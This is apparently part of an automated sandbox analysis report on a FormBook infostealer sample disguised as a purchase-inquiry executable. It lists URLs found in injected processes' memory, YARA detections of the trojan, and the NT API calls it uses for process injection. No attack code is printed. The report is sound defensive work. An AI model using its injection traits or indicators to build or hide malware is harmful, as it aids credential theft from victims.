                Source: replace.exe, 00000015.00000002.3680182899.0000000002DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: replace.exe, 00000015.00000002.3680182899.0000000002DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: replace.exe, 00000015.00000003.1667911216.0000000007D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: replace.exe, 00000015.00000002.3685026177.000000000436C000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003EEC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oblzpezqqfxqijsk.app
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/read/20230906001.png
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/read/wx-read/cos/css/animate.min.css?v=20230919001
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/read/wx-read/cos/css/hui/hui.css?v=0001
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/read/wx-read/cos/css/index.css?ver=0009
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/read/wx-read/cos/css/llc.css?ver=0002
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/read/wx-read/cos/js/flexible.js
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/ys_share/daily/back1.png
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/
                Source: yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.valentinaetommaso.it/page-not-found-404/
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07865E20 NtUnmapViewOfSection,0_2_07865E20
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07865E18 NtUnmapViewOfSection,0_2_07865E18
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0042B233 NtClose,4_2_0042B233
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12B60 NtClose,LdrInitializeThunk,4_2_00F12B60
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00F12C70
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00F12DF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F135C0 NtCreateMutant,LdrInitializeThunk,4_2_00F135C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F14340 NtSetContextThread,4_2_00F14340
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F14650 NtSuspendThread,4_2_00F14650
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12AF0 NtWriteFile,4_2_00F12AF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12AD0 NtReadFile,4_2_00F12AD0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12AB0 NtWaitForSingleObject,4_2_00F12AB0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12BF0 NtAllocateVirtualMemory,4_2_00F12BF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12BE0 NtQueryValueKey,4_2_00F12BE0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12BA0 NtEnumerateValueKey,4_2_00F12BA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12B80 NtQueryInformationFile,4_2_00F12B80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12CF0 NtOpenProcess,4_2_00F12CF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12CC0 NtQueryVirtualMemory,4_2_00F12CC0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12CA0 NtQueryInformationToken,4_2_00F12CA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12C60 NtCreateKey,4_2_00F12C60
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12C00 NtQueryInformationProcess,4_2_00F12C00
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12DD0 NtDelayExecution,4_2_00F12DD0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12DB0 NtEnumerateKey,4_2_00F12DB0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12D30 NtUnmapViewOfSection,4_2_00F12D30
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12D10 NtMapViewOfSection,4_2_00F12D10
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12D00 NtSetInformationFile,4_2_00F12D00
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12EE0 NtQueueApcThread,4_2_00F12EE0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12EA0 NtAdjustPrivilegesToken,4_2_00F12EA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12E80 NtReadVirtualMemory,4_2_00F12E80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12E30 NtWriteVirtualMemory,4_2_00F12E30
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12FE0 NtCreateFile,4_2_00F12FE0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12FB0 NtResumeThread,4_2_00F12FB0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12FA0 NtQuerySection,4_2_00F12FA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12F90 NtProtectVirtualMemory,4_2_00F12F90
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12F60 NtCreateProcessEx,4_2_00F12F60
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12F30 NtCreateSection,4_2_00F12F30
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F13090 NtSetValueKey,4_2_00F13090
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F13010 NtOpenDirectoryObject,4_2_00F13010
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F139B0 NtGetContextThread,4_2_00F139B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F13D70 NtOpenThread,4_2_00F13D70
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F13D10 NtOpenProcessToken,4_2_00F13D10
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D4340 NtSetContextThread,LdrInitializeThunk,21_2_032D4340
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D4650 NtSuspendThread,LdrInitializeThunk,21_2_032D4650
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2B60 NtClose,LdrInitializeThunk,21_2_032D2B60
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2BA0 NtEnumerateValueKey,LdrInitializeThunk,21_2_032D2BA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2BE0 NtQueryValueKey,LdrInitializeThunk,21_2_032D2BE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_032D2BF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2AF0 NtWriteFile,LdrInitializeThunk,21_2_032D2AF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2AD0 NtReadFile,LdrInitializeThunk,21_2_032D2AD0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2F30 NtCreateSection,LdrInitializeThunk,21_2_032D2F30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2FB0 NtResumeThread,LdrInitializeThunk,21_2_032D2FB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2FE0 NtCreateFile,LdrInitializeThunk,21_2_032D2FE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2E80 NtReadVirtualMemory,LdrInitializeThunk,21_2_032D2E80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2EE0 NtQueueApcThread,LdrInitializeThunk,21_2_032D2EE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2D30 NtUnmapViewOfSection,LdrInitializeThunk,21_2_032D2D30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2D10 NtMapViewOfSection,LdrInitializeThunk,21_2_032D2D10
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2DF0 NtQuerySystemInformation,LdrInitializeThunk,21_2_032D2DF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2DD0 NtDelayExecution,LdrInitializeThunk,21_2_032D2DD0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2C60 NtCreateKey,LdrInitializeThunk,21_2_032D2C60
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2C70 NtFreeVirtualMemory,LdrInitializeThunk,21_2_032D2C70
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2CA0 NtQueryInformationToken,LdrInitializeThunk,21_2_032D2CA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D35C0 NtCreateMutant,LdrInitializeThunk,21_2_032D35C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D39B0 NtGetContextThread,LdrInitializeThunk,21_2_032D39B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2B80 NtQueryInformationFile,21_2_032D2B80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2AB0 NtWaitForSingleObject,21_2_032D2AB0
